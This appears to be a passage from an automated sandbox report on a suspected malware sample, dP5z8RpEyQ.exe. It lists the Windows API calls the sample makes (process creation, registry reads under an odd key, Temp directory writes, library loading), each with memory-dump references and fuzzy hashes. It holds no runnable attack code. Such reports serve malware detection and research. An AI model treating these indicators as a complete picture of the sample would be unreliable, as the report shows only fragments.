                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseQueryValue
                                                                                                    • String ID: : Completed
                                                                                                    • API String ID: 3356406503-2954849223
                                                                                                    • Opcode ID: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
                                                                                                    • Instruction ID: d626b699d45c1b84179135bbe24e0f50758a75bbb6c39e90c48a844674782db3
                                                                                                    • Opcode Fuzzy Hash: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
                                                                                                    • Instruction Fuzzy Hash: BB017C7254020AABDF22CF61CC09FDB3FA8EF55364F01803AF959A2190D678D964DBA4

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 717 405773-4057a4 CreateProcessA 718 4057b2-4057b3 717->718 719 4057a6-4057af CloseHandle 717->719 719->718
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405786
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                    • Instruction ID: 33f777635f039691b801aef677aa15ec1976f60057d2e453273d56c3b7e761be
                                                                                                    • Opcode Fuzzy Hash: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                    • Instruction Fuzzy Hash: 58E04FF5600209BFEB009BA0DD09F7B7BACEB04304F008520BD40F2190D774A8148E78
                                                                                                    APIs
                                                                                                    • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 004025CD
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Enum$CloseValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 397863658-0
                                                                                                    • Opcode ID: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                    • Instruction ID: 773a7303ee78c1acb854ba03901dd4e05cd3950a579afad538e8a0ffc4c9b84d
                                                                                                    • Opcode Fuzzy Hash: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                    • Instruction Fuzzy Hash: 5A018F71604204FFE7219F54DE99ABF7ABCEF41358F20803EF505B61C0DAB84E459629
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3356406503-0
                                                                                                    • Opcode ID: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                    • Instruction ID: a38d896beb00bd6b96c1afca0a4d37843b6a01bbd6b744c8c042ddc4311e4418
                                                                                                    • Opcode Fuzzy Hash: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                    • Instruction Fuzzy Hash: E911BF71901205EFDF24CF64CA985AE7AB4EF01355F20843FE446B72C0D6B88A85DB19
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                    • Instruction ID: 845b7e25721e970e15b242f5633496821e9acd9660688f654d55c439198c0cfc
                                                                                                    • Opcode Fuzzy Hash: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                    • Instruction Fuzzy Hash: 0701F4316242209FE7195B389D04B2A3698E751314F10813FF951F65F2D678CC129B4C
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1136574915-0
                                                                                                    • Opcode ID: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                    • Instruction ID: 0d648207ff9f6deaa2b416c319ca4d02dfd5ede2de2ab3ccb6edf8448476ab2e
                                                                                                    • Opcode Fuzzy Hash: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                    • Instruction Fuzzy Hash: 3AE09232A04200EFD714EFA5EA8856F7BB0EB40325B20403FF001F10C1CA7848418A59
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(0001044A), ref: 00401581
                                                                                                    • ShowWindow.USER32(00010444), ref: 00401596
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                    • Instruction ID: 3a11bc7633d557fca9bfeaeb01eb6d797b1cc6e91976234f83cec9dd727a21ac
                                                                                                    • Opcode Fuzzy Hash: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                    • Instruction Fuzzy Hash: 66E086727101109FC718DF58ED9087F73A5EBC5310310853FE603B3291C6789D018E28
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                      • Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                                                                      • Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
                                                                                                      • Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2547128583-0
                                                                                                    • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                    • Instruction ID: 042920e8a29c9b7d047f9b8d679db2b98f9cdac4fa712678353772f8bdeb7375
                                                                                                    • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                    • Instruction Fuzzy Hash: 6EE0863260421167D6105B70BE0493B72A89E84700302043EF546F6144DB38DC769A6D
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                    • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                                                    • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                    • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                    • Instruction ID: 7e700ee3acf44982365c3fbd0e808c401ff2a4825d9ccd2943b1641dd8ae7ae4
                                                                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                    • Instruction Fuzzy Hash: ABD0A932004022ABC2002728AE0C88BBB90DB00270702CA35FCA4A22B1DB300C529A98
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
                                                                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1375471231-0
                                                                                                    • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                    • Instruction ID: 5acf7b5c2778cbfdcbae9b0437cf869adc97d3df665aa26c8b081b4f29c10bb0
                                                                                                    • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                    • Instruction Fuzzy Hash: 53C04C30204501EFDA106B209E08B177AD0AB50741F2548396146E10A0DA789455F92E
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
